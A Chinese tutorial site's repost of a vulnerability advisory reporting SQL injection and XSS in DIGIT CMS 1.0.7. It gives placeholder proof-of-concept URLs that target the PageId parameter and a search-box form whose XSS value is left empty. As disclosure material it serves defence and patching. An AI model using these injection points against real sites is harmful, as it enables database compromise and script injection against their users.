网站地图    收藏   

子栏目

主页 > 后端 > 网站安全 >

DIGIT CMS多个缺陷及修复 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 标题: DIGIT Cms SQL Injection / XSS Multiple Vulnerability作者: BHG Security Center下载地址: http://www.dig-it.co.il/影响版本: [1.0.7]测试平台: ubuntu 11.04发现者列表 - Net.Edit0r......

标题: DIGIT Cms SQL Injection / XSS Multiple Vulnerability
作者: BHG Security Center
下载地址: http://www.dig-it.co.il/
影响版本: [1.0.7]
测试平台: ubuntu 11.04
发现者列表
    - Net.Edit0r (Net.edit0r [at] att [dot] net)
    - G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com)
 
-----------------------------------------------------------------------------------------
DIGIT Israel Cms SQL Injection / XSS Multiple Vulnerability
-----------------------------------------------------------------------------------------
 
Author : BHG Security Center Web : http://Black-Hg.Org  Where : From Remote
---------------------------------------------------------------------------
 
PoC/Exploit:
~~~~~~~~~~
 
~ [PoC] ~: /website_path/Default.asp?sType=0&PageId=[Sqli]
 
~ [PoC]Http://www.2cto.com /path/Default.asp?sType=0&PageId=[Sqli]
 
 
 Enter In Search Box XSS Code ~
 
<FORM action="Default.asp?PageId=-1" method=POST id=searchFORM
name=searchFORM  style="margin:0;padding:0">
<INPUT type="hidden" value="" name="txtSEARCH">
</FORM>
 
~ [PoC] ~: Http://www.2cto.com /path/Default.asp
 
Note: There are vulnerabilities in the search field that you can use
 
 

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论